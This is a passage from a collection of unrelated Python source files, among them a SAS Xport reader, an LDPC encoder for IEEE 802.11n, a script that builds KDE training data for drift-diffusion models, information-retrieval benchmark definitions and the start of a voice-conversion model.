self.filepath_or_buffer.seek(self.record_start)
return (total_records_length - tail_pad) // self.record_length
def get_chunk(self, size=None):
"""
Reads lines from Xport file and returns as dataframe
Parameters
----------
size : int, defaults to None
Number of lines to read. If None, reads whole file.
Returns
-------
DataFrame
"""
if size is None:
size = self._chunksize
return self.read(nrows=size)
def _missing_double(self, vec):
v = vec.view(dtype="u1,u1,u2,u4")
miss = (v["f1"] == 0) & (v["f2"] == 0) & (v["f3"] == 0)
miss1 = (
((v["f0"] >= 0x41) & (v["f0"] <= 0x5A))
| (v["f0"] == 0x5F)
| (v["f0"] == 0x2E)
)
miss &= miss1
return miss
@Appender(_read_method_doc)
def read(self, nrows=None):
if nrows is None:
nrows = self.nobs
read_lines = min(nrows, self.nobs - self._lines_read)
read_len = read_lines * self.record_length
if read_len <= 0:
self.close()
raise StopIteration
raw = self.filepath_or_buffer.read(read_len)
data = np.frombuffer(raw, dtype=self._dtype, count=read_lines)
df = pd.DataFrame(index=range(read_lines))
for j, x in enumerate(self.columns):
vec = data["s" + str(j)]
ntype = self.fields[j]["ntype"]
if ntype == "numeric":
vec = _handle_truncated_float_vec(vec, self.fields[j]["field_length"])
miss = self._missing_double(vec)
v = _parse_float_vec(vec)
v[miss] = np.nan
elif self.fields[j]["ntype"] == "char":
v = [y.rstrip() for y in vec]
if self._encoding is not None:
v = [y.decode(self._encoding) for y in v]
df[x] = v
if self._index is None:
df.index = range(self._lines_read, self._lines_read + read_lines)
else:
df = df.set_index(self._index)
self._lines_read += read_lines
return df
|
py | 1a4ba5694cc017f58f30cbd809e4bda8d618daf2 | from schmetterling.core.log import log_config, log_params_return
from schmetterling.log.state import LogState
@log_params_return('info')
def execute(state, log_dir, name, level):
log_handlers = log_config(log_dir, name, level)
return LogState(__name__, log_handlers['file_handler'].baseFilename)
|
py | 1a4ba5a42db8743a154d3cbe490858a480309e93 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from enum import Enum
MODULE_EXCEPT_LIST = ['Sequential']
class OpTypeName(str, Enum):
"""
op type to its type name str
"""
Attr = 'Attr'
Constant = 'Constant'
LayerChoice = 'LayerChoice'
InputChoice = 'InputChoice'
ValueChoice = 'ValueChoice'
Placeholder = 'Placeholder'
MergedSlice = 'MergedSlice'
Repeat = 'Repeat'
Cell = 'Cell'
|
py | 1a4ba6a4146cd4e4985af8dc7c3b3de714edfa43 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""Day 5 of AdventOfCode.com: regex matching"""
import re
import os
class RegexMatchCounter(object):
"""This class counts strings which satisfy all specified regular expressions
"""
def __init__(self, regex_strings):
"""The constructor needs a list of valid regular expressions.
:param regex_strings: list of valid regular expressions to be matched"""
self.__regexes = [re.compile(regex) for regex in regex_strings]
self.__count = 0
def check(self, target):
"""This method checks its string argument against regexes and, if all of them matched, increases the counter
:param target: string to be matched
"""
if all(reg.search(target) is not None for reg in self.__regexes):
self.__count += 1
def count(self):
""":return: the current value of how many strings have matched regexes
"""
return self.__count
matchers = [
RegexMatchCounter([r'([aeiou].*){3}', r'(.)\1', r'^((?!(ab)|(cd)|(pq)|(xy)).)*$']),
RegexMatchCounter([r'(..).*\1', r'(.).\1'])
]
with open(os.path.dirname(os.path.realpath('__file__')) + "/input/day5.txt", "r") as datafile:
for line in datafile:
for matcher in matchers:
matcher.check(line)
for matcher in matchers:
print(matcher.count())
|
py | 1a4ba7219b34b9f6f0684cdb37eb5d996de8be6f | from ldpc.encoder.base_encoder import Encoder
import numpy.typing as npt
import numpy as np
from bitstring import Bits
from ldpc.utils.custom_exceptions import IncorrectLength
from ldpc.utils.qc_format import QCFile
import os
from numpy.typing import NDArray
from ldpc.wifi_spec_codes import WiFiSpecCode
from typing import Any
class EncoderWiFi(Encoder):
"""Encode messages according to the codes in the IEEE802.11n standard"""
_spec_base_path: str = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'code_specs', 'ieee802.11')
def __init__(self, spec: WiFiSpecCode) -> None:
"""
:param spec: specify which code from the spec we use
"""
self.spec = spec
qc_file = QCFile.from_file(os.path.join(self._spec_base_path, spec.name + ".qc"))
self.h = qc_file.to_array()
self.m, n = self.h.shape
k = n - self.m
self.z = qc_file.z
self.block_structure = qc_file.block_structure
super().__init__(k, n)
def encode(self, information_bits: Bits) -> Bits:
"""Based on: Efficient encoding of IEEE 802.11n LDPC codes,
https://www.researchgate.net/publication/3389450_Efficient_encoding_of_IEEE_80211n_LDPC_codes
"""
if len(information_bits) != self.k:
raise IncorrectLength
shifted_messages = self._shifted_messages(information_bits)
parities: npt.NDArray[np.int_] = np.zeros((self.m//self.z, self.z), dtype=np.int_)
# special parts see article
parities[0, :] = np.sum(shifted_messages, axis=0) % 2 # find first batch of z parity bits
parities[1, :] = (shifted_messages[0, :] + np.roll(parities[0, :], -1)) % 2 # find second set of z parity bits
parities[-1, :] = (shifted_messages[-1, :] + np.roll(parities[0, :], -1)) % 2 # find last set of z parity bits
for idx in range(1, (self.m//self.z)-2): # -1 needed to avoid exceeding memory limits due to idx+1 below.
# -2 needed as bottom row is a special case.
if self.block_structure[idx][self.k // self.z] >= 0:
# special treatment of x-th row, see article
parities[idx+1, :] = (parities[idx, :] + shifted_messages[idx, :] + parities[0, :]) % 2
else:
parities[idx+1, :] = (parities[idx, :] + shifted_messages[idx, :]) % 2
return information_bits + Bits(np.ravel(parities))
def _shifted_messages(self, information_bits: Bits) -> NDArray[np.int_]:
# break message bits into groups (rows) of Z bits. Each row is a subset of z bits, overall k message bits
bit_blocks: npt.NDArray[np.int_] = np.array(information_bits, dtype=np.int_).reshape((self.k // self.z, self.z))
# find shifted messages (termed lambda_i in article)
shifted_messages: npt.NDArray[np.int_] = np.zeros((self.m // self.z, self.z),
dtype=np.int_) # each row is a sum of circular shifts of
# message bits (some lambda_i in article). One row per block of h.
for i in range(self.m // self.z):
for j in range(self.k // self.z):
if self.block_structure[i][j] >= 0: # zero blocks don't contribute to parity bits
# multiply by translation reduces to shift.
vec: npt.NDArray[Any] = np.roll(bit_blocks[j, :], -self.block_structure[i][j])
shifted_messages[i, :] = np.logical_xor(shifted_messages[i, :], vec) # xor as sum mod 2
return shifted_messages
|
py | 1a4ba7667873f818445881070efecc4204aa4a3f | # Basic python
import numpy as np
import scipy as scp
from scipy.stats import gamma
from scipy.stats import mode
from scipy.stats import itemfreq
from scipy.stats import mode
import pandas as pd
import random
# Parallelization
import multiprocessing as mp
from multiprocessing import Process
from multiprocessing import Pool
import psutil
import argparse
# System utilities
from datetime import datetime
import time
import os
import pickle
import uuid
import glob
import gc
# My own code
import kde_class
#import ddm_data_simulation as ddm_simulator
import boundary_functions as bf
from cdwiener import batch_fptd
# Plotting
import matplotlib.pyplot as plt
# /users/afengler/data/kde/full_ddm/training_data_binned_0_nbins_0_n_20000/full_ddm_nchoices_2_train_data_binned_0_nbins_0_n_20000_213.pickle
# /users/afengler/data/kde/full_ddm/training_data_binned_0_nbins_0_n_20000/simulator_statistics_213.pickle
def filter_simulations_fast(base_simulation_folder = '',
file_name_prefix = '',
file_id = 0,
method_params = [],
param_ranges = 'none', # either 'none' or dict that specifies allowed ranges for parameters
filters = {'mode': 20, # != (checking if mode is max_rt)
'choice_cnt': 0, # > (checking that each choice receive at least 10 samples in simulator)
'mean_rt': 15, # < (checking that mean_rt is smaller than specified value
'std': 0, # > (checking that std is positive for each choice)
'mode_cnt_rel': 0.5 # < (checking that mode does not receive more than a proportion of samples for each choice)
}
):
file_ = pickle.load(open( base_simulation_folder + file_name_prefix + '_' + str(file_id) + '.pickle', 'rb' ))
init_cols = method_params['param_names'] + method_params['boundary_param_names']
n_datasets = file_[1].shape[0]
# Initialize data frame
sim_stat_data = pd.DataFrame(file_[0],
columns = init_cols)
# MAX RT BY SIMULATION: TEST SHOULD BE CONSISTENT
n_simulations = file_[1].shape[1] #['n_samples']
# TODO: BASE SIMULATIONS FILES NEED TO HOLD THE N-CHOICES PROPERTY DIRECTLY
# TODO RESOLVED
n_choices = len(file_[2]['possible_choices'])
#n_choices = len(np.unique(file_[1][0, :, 1])) # ['n_choices']
# TODO: BASE SIMULATIONS NEED TO HOLD THE UNIQUE CHOICES PROPERTY DIRECTLY
# RIGHT NOW THIS CODE USES THE DATA ITSELF TO RECOVER THE POSSIBLE CHOICES BUT THIS ALLOWS FOR READING IN N CHOICES < REAL N CHOICES
# TODO RESOLVED
choices = file_[2]['possible_choices']
#choices = np.unique(file_[1][0, :, 1])
#n_choices = len(file_[0][2]['possible_choices'])
#choices = file_[0][2]['possible_choices']
max_rts = np.zeros((n_datasets, 1))
max_t = file_[2]['max_t']
sim_stat_data['max_t'] = max_t
#max_ts[:] = max_t
max_ts = np.zeros((n_datasets, 1))
stds = np.zeros((n_datasets, n_choices))
mean_rts = np.zeros((n_datasets, n_choices))
choice_cnts = np.zeros((n_datasets, n_choices))
modes = np.zeros((n_datasets, n_choices))
mode_cnts = np.zeros((n_datasets, n_choices))
#sim_stat_data = [None] * n_datasets
cnt = 0
for i in range(n_datasets):
max_rts[i] = (file_[1][i, :, 0].max().round(2))
max_ts[i] = max_t
#max_ts[i] = (file_[1][i][2]['max_t'])
# Standard deviation of reaction times
choice_cnt = 0
for choice_tmp in choices:
tmp_rts = file_[1][i, :, 0][file_[1][i, :, 1] == choice_tmp]
n_c = len(tmp_rts)
choice_cnts[cnt, choice_cnt] = n_c
mode_tmp = mode(tmp_rts)
if n_c > 0:
mean_rts[cnt, choice_cnt] = np.mean(tmp_rts)
stds[cnt, choice_cnt] = np.std(tmp_rts)
modes[cnt, choice_cnt] = float(mode_tmp[0])
mode_cnts[cnt, choice_cnt] = int(mode_tmp[1])
else:
mean_rts[cnt, choice_cnt] = - 1
stds[cnt, choice_cnt] = - 1
modes[cnt, choice_cnt] = - 1
mode_cnts[cnt, choice_cnt] = 0
choice_cnt += 1
# Basic data column
# TODO: Put this back in respecting new input format
#sim_stat_data[cnt] = [file_[i][2][key] for key in list(file_[i][2].keys())]
cnt += 1
if cnt % 1000 == 0:
print(cnt)
#sim_stat_data = pd.DataFrame(sim_stat_data, columns = file_[0][2].keys())
# Compute some more columns
for i in range(0, n_choices, 1):
sim_stat_data['mean_rt_' + str(i)] = mean_rts[:, i]
sim_stat_data['std_' + str(i)] = stds[:, i]
sim_stat_data['choice_cnt_' + str(i)] = choice_cnts[:,i]
sim_stat_data['mode_' + str(i)] = modes[:, i]
sim_stat_data['mode_cnt_' + str(i)] = mode_cnts[:, i]
# Derived Columns
sim_stat_data['choice_prop_' + str(i)] = sim_stat_data['choice_cnt_' + str(i)] / n_simulations
sim_stat_data['mode_cnt_rel_' + str(i)] = sim_stat_data['mode_cnt_' + str(i)] / sim_stat_data['choice_cnt_' + str(i)]
# Clean-up
sim_stat_data = sim_stat_data.round(decimals = 2)
sim_stat_data = sim_stat_data.fillna(value = 0)
# check that max_t is consistently the same value across simulations
#assert len(np.unique(max_ts)) == 1
# Now filtering
# FILTER 1: PARAMETER RANGES
if param_ranges == 'none':
keep = sim_stat_data['max_t'] >= 0 # should return a vector of all true's
else:
cnt = 0
for param in param_ranges.keys():
if cnt == 0:
keep = (sim_stat_data[param] >= param_ranges[param][0]) & (sim_stat_data[param] <= param_ranges[param][1])
else:
keep = (keep) & \
(sim_stat_data[param] >= param_ranges[param][0]) & (sim_stat_data[param] <= param_ranges[param][1])
cnt += 1
# FILTER 2: SANITY CHECKS (Filter-bank)
for i in range(0, n_choices, 1):
keep = (keep) & \
(sim_stat_data['mode_' + str(i)] != filters['mode']) & \
(sim_stat_data['choice_cnt_' + str(i)] > filters['choice_cnt']) & \
(sim_stat_data['mean_rt_' + str(i)] < filters['mean_rt']) & \
(sim_stat_data['std_' + str(i)] > filters['std']) & \
(sim_stat_data['mode_cnt_rel_' + str(i)] < filters['mode_cnt_rel'])
# Add keep_file column to
sim_stat_data['keep_file'] = keep
# Write files:
#pickle.dump(list(sim_stat_data.loc[keep, 'file']), open(base_simulation_folder + '/keep_files.pickle', 'wb'))
pickle.dump(sim_stat_data,
open(base_simulation_folder + '/simulator_statistics' + '_' + str(file_id) + '.pickle', 'wb'))
return sim_stat_data
def make_kde_data(data = [], metadata = [], n_kde = 100, n_unif_up = 100, n_unif_down = 100, idx = 0):
# def make_kde_data(n_kde = 100, n_unif_up = 100, n_unif_down = 100, idx = 0):
# meta_data = file_[2]
# data = file_[1][idx, :, :]
out = np.zeros((n_kde + n_unif_up + n_unif_down, 3))
tmp_kde = kde_class.logkde((data[:, 0], data[:, 1], metadata))
# Get kde part
samples_kde = tmp_kde.kde_sample(n_samples = n_kde)
likelihoods_kde = tmp_kde.kde_eval(data = samples_kde).ravel()
out[:n_kde, 0] = samples_kde[0].ravel()
out[:n_kde, 1] = samples_kde[1].ravel()
out[:n_kde, 2] = likelihoods_kde
# Get positive uniform part:
choice_tmp = np.random.choice(metadata['possible_choices'], size = n_unif_up)
if metadata['max_t'] < 100:
rt_tmp = np.random.uniform(low = 0.0001,
high = metadata['max_t'],
size = n_unif_up)
else:
rt_tmp = np.random.uniform(low = 0.0001,
high = 100,
size = n_unif_up)
likelihoods_unif = tmp_kde.kde_eval(data = (rt_tmp, choice_tmp)).ravel()
out[n_kde:(n_kde + n_unif_up), 0] = rt_tmp
out[n_kde:(n_kde + n_unif_up), 1] = choice_tmp
out[n_kde:(n_kde + n_unif_up), 2] = likelihoods_unif
# Get negative uniform part:
choice_tmp = np.random.choice(metadata['possible_choices'], #['possible_choices'],
size = n_unif_down)
rt_tmp = np.random.uniform(low = - 1.0,
high = 0.0001,
size = n_unif_down)
out[(n_kde + n_unif_up):, 0] = rt_tmp
out[(n_kde + n_unif_up):, 1] = choice_tmp
out[(n_kde + n_unif_up):, 2] = -66.77497
if idx % 10 == 0:
print(idx)
return out.astype(np.float)
def make_fptd_data(data = [], params = [], metadata = [], n_kde = 100, n_unif_up = 100, n_unif_down = 100, idx = 0):
out = np.zeros((n_kde + n_unif_up + n_unif_down, 3))
tmp_kde = kde_class.logkde((data[:, 0], data[:, 1], metadata))
# Get kde part
samples_kde = tmp_kde.kde_sample(n_samples = n_kde)
out[:n_kde, 0] = samples_kde[0].ravel()
out[:n_kde, 1] = samples_kde[1].ravel()
# If we have 4 parameters we know we have the ddm --> use default sdv = 0
if len(params) == 4:
out[:n_kde, 2] = np.log(batch_fptd(out[:n_kde, 0] * out[:n_kde, 1] * ( -1),
params[0],
params[1] * 2,
params[2],
params[3]))
# If we have 5 parameters but analytic we know we need to use the ddm_sdv --> supply sdv value to batch_fptd
if len(params) == 5:
out[:n_kde, 2] = np.log(batch_fptd(out[:n_kde, 0] * out[:n_kde, 1] * ( -1),
params[0],
params[1] * 2,
params[2],
params[3],
params[4]))
# Get positive uniform part:
choice_tmp = np.random.choice(metadata['possible_choices'], size = n_unif_up)
if metadata['max_t'] < 100:
rt_tmp = np.random.uniform(low = 0.0001,
high = metadata['max_t'],
size = n_unif_up)
else:
rt_tmp = np.random.uniform(low = 0.0001,
high = 100,
size = n_unif_up)
likelihoods_unif = tmp_kde.kde_eval(data = (rt_tmp, choice_tmp)).ravel()
out[n_kde:(n_kde + n_unif_up), 0] = rt_tmp
out[n_kde:(n_kde + n_unif_up), 1] = choice_tmp
# If we have 4 parameters we know we have the ddm --> use default sdv = 0
if len(params) == 4:
out[n_kde:(n_kde + n_unif_up), 2] = np.log(batch_fptd(out[n_kde:(n_kde + n_unif_up), 0] * out[n_kde:(n_kde + n_unif_up), 1] * (- 1),
params[0],
params[1] * 2,
params[2],
params[3]))
# If we have 5 parameters but analytic we know we need to use the ddm_sdv --> supply sdv value to batch_fptd
if len(params) == 5:
out[n_kde:(n_kde + n_unif_up), 2] = np.log(batch_fptd(out[n_kde:(n_kde + n_unif_up), 0] * out[n_kde:(n_kde + n_unif_up), 1] * (- 1),
params[0],
params[1] * 2,
params[2],
params[3],
params[4]))
# Get negative uniform part:
choice_tmp = np.random.choice(metadata['possible_choices'],
size = n_unif_down)
rt_tmp = np.random.uniform(low = - 1.0,
high = 0.0001,
size = n_unif_down)
out[(n_kde + n_unif_up):, 0] = rt_tmp
out[(n_kde + n_unif_up):, 1] = choice_tmp
out[(n_kde + n_unif_up):, 2] = -66.77497
if idx % 10 == 0:
print(idx)
return out.astype(np.float)
# We should be able to parallelize this !
def kde_from_simulations_fast_parallel(base_simulation_folder = '',
file_name_prefix = '',
file_id = 1,
target_folder = '',
n_by_param = 3000,
mixture_p = [0.8, 0.1, 0.1],
process_params = ['v', 'a', 'w', 'c1', 'c2'],
print_info = False,
n_processes = 'all',
analytic = False):
# Parallel
if n_processes == 'all':
n_cpus = psutil.cpu_count(logical = False)
else:
n_cpus = n_processes
print('Number of cpus: ')
print(n_cpus)
file_ = pickle.load(open( base_simulation_folder + '/' + file_name_prefix + '_' + str(file_id) + '.pickle', 'rb' ) )
stat_ = pickle.load(open( base_simulation_folder + '/simulator_statistics' + '_' + str(file_id) + '.pickle', 'rb' ) )
# Initialize dataframe
# Initializations
n_kde = int(n_by_param * mixture_p[0])
n_unif_down = int(n_by_param * mixture_p[1])
n_unif_up = int(n_by_param * mixture_p[2])
n_kde = n_kde + (n_by_param - n_kde - n_unif_up - n_unif_down) # correct n_kde if sum != n_by_param
# Add possible choices to file_[2] which is the meta data for the simulator (expected when loaded the kde class)
# TODO: THIS INFORMATION SHOULD BE INCLUDED AS META-DATA INTO THE BASE SIMULATOIN FILES
file_[2]['possible_choices'] = np.unique([-1, 1])
#file_[2]['possible_choices'] = np.unique(file_[1][0, :, 1])
file_[2]['possible_choices'].sort()
# CONTINUE HERE
# Preparation loop --------------------------------------------------------------------
#s_id_kde = np.sum(stat_['keep_file']) * (n_unif_down + n_unif_up)
cnt = 0
starmap_iterator = ()
tmp_sim_data_ok = 0
results = []
for i in range(file_[1].shape[0]):
if stat_['keep_file'][i]:
# Don't remember what this part is doing....
if tmp_sim_data_ok:
pass
else:
tmp_sim_data = file_[1][i]
tmp_sim_data_ok = 1
lb = cnt * (n_unif_down + n_unif_up + n_kde)
# Allocate to starmap tuple for mixture component 3
if analytic:
starmap_iterator += ((file_[1][i, :, :].copy(), file_[0][i, :].copy(), file_[2].copy(), n_kde, n_unif_up, n_unif_down, cnt), )
else:
starmap_iterator += ((file_[1][i, :, :], file_[2], n_kde, n_unif_up, n_unif_down, cnt), )
cnt += 1
if (cnt % 100 == 0) or (i == file_[1].shape[0] - 1):
with Pool(processes = n_cpus, maxtasksperchild = 200) as pool:
results.append(np.array(pool.starmap(make_kde_data, starmap_iterator)).reshape((-1, 3)))
starmap_iterator = ()
print(i, 'arguments generated')
if not stat_['keep_file'][i]:
if (i == (file_[1].shape[0] - 1)) and len(starmap_iterator) > 0:
with Pool(processes = n_cpus, maxtasksperchild = 200) as pool:
results.append(np.array(pool.starmap(make_kde_data, starmap_iterator)).reshape((-1, 3)))
starmap_iterator = ()
print(i, 'last dataset was not kept')
my_columns = process_params + ['rt', 'choice', 'log_l']
data = pd.DataFrame(np.zeros((np.sum(stat_['keep_file']) * n_by_param, len(my_columns))),
columns = my_columns)
data.values[:, -3:] = np.concatenate(results)
# Filling in training data frame ---------------------------------------------------
cnt = 0
tmp_sim_data_ok = 0
for i in range(file_[1].shape[0]):
if stat_['keep_file'][i]:
# Don't remember what this part is doing....
if tmp_sim_data_ok:
pass
else:
tmp_sim_data = file_[1][i]
tmp_sim_data_ok = 1
lb = cnt * (n_unif_down + n_unif_up + n_kde)
# Make empty dataframe of appropriate size
p_cnt = 0
for param in process_params:
data.iloc[(lb):(lb + n_unif_down + n_unif_up + n_kde), my_columns.index(param)] = file_[0][i, p_cnt]
p_cnt += 1
cnt += 1
# ----------------------------------------------------------------------------------
# Store data
print('writing data to file: ', target_folder + '/data_' + str(file_id) + '.pickle')
pickle.dump(data.values, open(target_folder + '/data_' + str(file_id) + '.pickle', 'wb'), protocol = 4)
#data.to_pickle(target_folder + '/data_' + str(file_id) + '.pickle' , protocol = 4)
# Write metafile if it doesn't exist already
# Hack for now: Just copy one of the base simulations files over
if os.path.isfile(target_folder + '/meta_data.pickle'):
pass
else:
pickle.dump(tmp_sim_data, open(target_folder + '/meta_data.pickle', 'wb') )
return 0 #data
# UNUSED FROM PREV FUNCTION
# Garbage collection before starting pool:
# del file_
# gc.collect()
# if analytic:
# with Pool(processes = n_cpus, maxtasksperchild = 200) as pool:
# #result = np.array(pool.starmap(make_fptd_data, starmap_iterator)) #.reshape((-1, 3))
# result = pool.starmap(make_fptd_data, starmap_iterator)
# else:
# with Pool(processes = n_cpus, maxtasksperchild = 200) as pool:
# #result = np.array(pool.starmap(make_kde_data, starmap_iterator)) #.reshape((-1, 3))
# result = pool.starmap(make_kde_data, starmap_iterator)
# result = np.array(result).reshape((-1, 3))
# Make dataframe to save
# Initialize dataframe
def kde_from_simulations_fast(base_simulation_folder = '',
file_name_prefix = '',
file_id = 1,
target_folder = '',
n_by_param = 3000,
mixture_p = [0.8, 0.1, 0.1],
process_params = ['v', 'a', 'w', 'c1', 'c2'],
print_info = False
):
file_ = pickle.load(open( base_simulation_folder + '/' + file_name_prefix + '_' + str(file_id) + '.pickle', 'rb' ) )
stat_ = pickle.load(open( base_simulation_folder + '/simulator_statistics' + '_' + str(file_id) + '.pickle', 'rb' ) )
# Initialize dataframe
my_columns = process_params + ['rt', 'choice', 'log_l']
data = pd.DataFrame(np.zeros((np.sum(stat_['keep_file']) * n_by_param, len(my_columns))),
columns = my_columns)
n_kde = int(n_by_param * mixture_p[0])
n_unif_down = int(n_by_param * mixture_p[1])
n_unif_up = int(n_by_param * mixture_p[2])
n_kde = n_kde + (n_by_param - n_kde - n_unif_up - n_unif_down) # correct n_kde if sum != n_by_param
# Add possible choices to file_[2] which is the meta data for the simulator (expected when loaded the kde class)
# TODO: THIS INFORMATION SHOULD BE INCLUDED AS META-DATA INTO THE BASE SIMULATOIN FILES
file_[2]['possible_choices'] = np.unique([-1,1])
#file_[2]['possible_choices'] = np.unique(file_[1][0, :, 1])
file_[2]['possible_choices'].sort()
# CONTINUE HERE
# Main while loop --------------------------------------------------------------------
#row_cnt = 0
cnt = 0
for i in range(file_[1].shape[0]):
if stat_['keep_file'][i]:
# Read in simulator file
tmp_sim_data = file_[1][i]
lb = cnt * n_by_param
# Make empty dataframe of appropriate size
p_cnt = 0
for param in process_params:
data.iloc[(lb):(lb + n_by_param), my_columns.index(param)] = file_[0][i, p_cnt] #tmp_sim_data[2][param]
p_cnt += 1
# MIXTURE COMPONENT 1: Get simulated data from kde -------------------------------
tmp_kde = kde_class.logkde((file_[1][i, :, 0], file_[1][i, :, 1], file_[2])) #[tmp_sim_data)
tmp_kde_samples = tmp_kde.kde_sample(n_samples = n_kde)
data.iloc[lb:(lb + n_kde), my_columns.index('rt')] = tmp_kde_samples[0].ravel()
data.iloc[lb:(lb + n_kde), my_columns.index('choice')] = tmp_kde_samples[1].ravel()
data.iloc[lb:(lb + n_kde), my_columns.index('log_l')] = tmp_kde.kde_eval(data = tmp_kde_samples).ravel()
# --------------------------------------------------------------------------------
# MIXTURE COMPONENT 2: Negative uniform part -------------------------------------
choice_tmp = np.random.choice(file_[2]['possible_choices'], #['possible_choices'],
size = n_unif_down)
rt_tmp = np.random.uniform(low = - 1,
high = 0.0001,
size = n_unif_down)
data.iloc[(lb + n_kde):(lb + n_kde + n_unif_down), my_columns.index('rt')] = rt_tmp
data.iloc[(lb + n_kde):(lb + n_kde + n_unif_down), my_columns.index('choice')] = choice_tmp
data.iloc[(lb + n_kde):(lb + n_kde + n_unif_down), my_columns.index('log_l')] = -66.77497 # the number corresponds to log(1e-29)
# ---------------------------------------------------------------------------------
# MIXTURE COMPONENT 3: Positive uniform part --------------------------------------
choice_tmp = np.random.choice(file_[2]['possible_choices'],
size = n_unif_up)
if file_[2]['max_t'] < 100:
rt_tmp = np.random.uniform(low = 0.0001,
high = file_[2]['max_t'],
size = n_unif_up)
else:
rt_tmp = np.random.uniform(low = 0.0001,
high = 100,
size = n_unif_up)
data.iloc[(lb + n_kde + n_unif_down):(lb + n_by_param), my_columns.index('rt')] = rt_tmp
data.iloc[(lb + n_kde + n_unif_down):(lb + n_by_param), my_columns.index('choice')] = choice_tmp
data.iloc[(lb + n_kde + n_unif_down):(lb + n_by_param), my_columns.index('log_l')] = tmp_kde.kde_eval(data = (rt_tmp, choice_tmp))
# ----------------------------------------------------------------------------------
cnt += 1
if i % 10 == 0:
print(i, 'kdes generated')
# -----------------------------------------------------------------------------------
# Store data
print('writing data to file: ', target_folder + '/data_' + str(file_id) + '.pickle')
pickle.dump(data.values, open(target_folder + '/data_' + str(file_id) + '.pickle', 'wb'), protocol = 4)
# Write metafile if it doesn't exist already
# Hack for now: Just copy one of the base simulations files over
if os.path.isfile(target_folder + '/meta_data.pickle'):
pass
else:
pickle.dump(tmp_sim_data, open(target_folder + '/meta_data.pickle', 'wb') )
return data
def kde_load_data_new(path = '',
file_id_list = '',
prelog_cutoff_low = 1e-29,
prelog_cutoff_high = 100,
n_samples_by_dataset = 10000000,
return_log = True,
make_split = True,
val_p = 0.01):
# Read in two datasets to get meta data for the subsequent
print('Reading in initial dataset')
tmp_data = np.load(path + file_id_list[0], allow_pickle = True)
# Collect some meta data
n_files = len(file_id_list)
print('n_files: ', n_files)
print('n_samples_by_dataset: ', n_samples_by_dataset)
# Allocate memory for data
print('Allocating data arrays')
features = np.zeros((n_files * n_samples_by_dataset, tmp_data.shape[1] - 1))
labels = np.zeros((n_files * n_samples_by_dataset, 1))
# Read in data of initialization files
cnt_samples = tmp_data.shape[0]
features[:cnt_samples, :] = tmp_data[:, :-1]
labels[:cnt_samples, 0] = tmp_data[:, -1]
# Read in remaining files into preallocated np.array
for i in range(1, n_files, 1):
tmp_data = np.load(path + file_id_list[i], allow_pickle = True)
n_rows_tmp = tmp_data.shape[0]
features[(cnt_samples): (cnt_samples + n_rows_tmp), :] = tmp_data[:, :-1]
labels[(cnt_samples): (cnt_samples + n_rows_tmp), 0] = tmp_data[:, -1]
cnt_samples += n_rows_tmp
print(i, ' files processed')
features.resize((cnt_samples, features.shape[1]), refcheck = False)
labels.resize((cnt_samples, labels.shape[1]), refcheck = False)
print('new n rows features: ', features.shape[0])
print('new n rows labels: ', labels.shape[0])
if prelog_cutoff_low != 'none':
labels[labels < np.log(prelog_cutoff_low)] = np.log(prelog_cutoff_low)
if prelog_cutoff_high != 'none':
labels[labels > np.log(prelog_cutoff_high)] = np.log(prelog_cutoff_high)
if return_log == False:
labels = np.exp(labels)
if make_split:
# Making train test split
print('Making train test split...')
train_idx = np.random.choice(a = [False, True], size = cnt_samples, p = [val_p, 1 - val_p])
test_idx = np.invert(train_idx)
return ((features[train_idx, :], labels[train_idx, :]), (features[test_idx, :], labels[test_idx, :]))
else:
return features, labels
|
py | 1a4ba77dcae58cef73a46f660acfbfdb3c356a7b | from capreolus import Dependency, constants
from . import Benchmark
PACKAGE_PATH = constants["PACKAGE_PATH"]
@Benchmark.register
class Robust04(Benchmark):
"""Robust04 benchmark using the title folds from Huston and Croft. [1] Each of these is used as the test set.
Given the remaining four folds, we split them into the same train and dev sets used in recent work. [2]
[1] Samuel Huston and W. Bruce Croft. 2014. Parameters learned in the comparison of retrieval models using term dependencies. Technical Report.
[2] Sean MacAvaney, Andrew Yates, Arman Cohan, Nazli Goharian. 2019. CEDR: Contextualized Embeddings for Document Ranking. SIGIR 2019.
"""
module_name = "robust04"
dependencies = [Dependency(key="collection", module="collection", name="robust04")]
qrel_file = PACKAGE_PATH / "data" / "qrels.robust2004.txt"
topic_file = PACKAGE_PATH / "data" / "topics.robust04.301-450.601-700.txt"
fold_file = PACKAGE_PATH / "data" / "rob04_cedr_folds.json"
query_type = "title"
@Benchmark.register
class Robust04Yang19(Benchmark):
"""Robust04 benchmark using the folds from Yang et al. [1]
[1] Wei Yang, Kuang Lu, Peilin Yang, and Jimmy Lin. 2019. Critically Examining the "Neural Hype": Weak Baselines and the Additivity of Effectiveness Gains from Neural Ranking Models. SIGIR 2019.
"""
module_name = "robust04.yang19"
dependencies = [Dependency(key="collection", module="collection", name="robust04")]
qrel_file = PACKAGE_PATH / "data" / "qrels.robust2004.txt"
topic_file = PACKAGE_PATH / "data" / "topics.robust04.301-450.601-700.txt"
fold_file = PACKAGE_PATH / "data" / "rob04_yang19_folds.json"
query_type = "title"
@Benchmark.register
class Robust04Yang19Desc(Robust04Yang19, Benchmark):
module_name = "robust04.yang19.desc"
query_type = "desc"
|
py | 1a4ba7bc74c31f161a659870c26ed51605f2069d | """FragmentVC model architecture."""
from typing import Tuple, List, Optional
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
from .convolutional_transformer import Smoother, Extractor
class FragmentVC(nn.Module):
"""
FragmentVC uses Wav2Vec feature of the source speaker to query and attend
on mel spectrogram of the target speaker.
"""
def __init__(self, d_model=512):
super().__init__()
self.unet = UnetBlock(d_model)
self.smoothers = nn.TransformerEncoder(Smoother(d_model, 2, 1024), num_layers=3)
self.mel_linear = nn.Linear(d_model, 80)
self.post_net = nn.Sequential(
nn.Conv1d(80, 512, kernel_size=5, padding=2),
nn.BatchNorm1d(512),
nn.Tanh(),
nn.Dropout(0.5),
nn.Conv1d(512, 512, kernel_size=5, padding=2),
nn.BatchNorm1d(512),
nn.Tanh(),
nn.Dropout(0.5),
nn.Conv1d(512, 512, kernel_size=5, padding=2),
nn.BatchNorm1d(512),
nn.Tanh(),
nn.Dropout(0.5),
nn.Conv1d(512, 512, kernel_size=5, padding=2),
nn.BatchNorm1d(512),
nn.Tanh(),
nn.Dropout(0.5),
nn.Conv1d(512, 80, kernel_size=5, padding=2),
nn.BatchNorm1d(80),
nn.Dropout(0.5),
)
def forward(
self,
srcs: Tensor,
refs: Tensor,
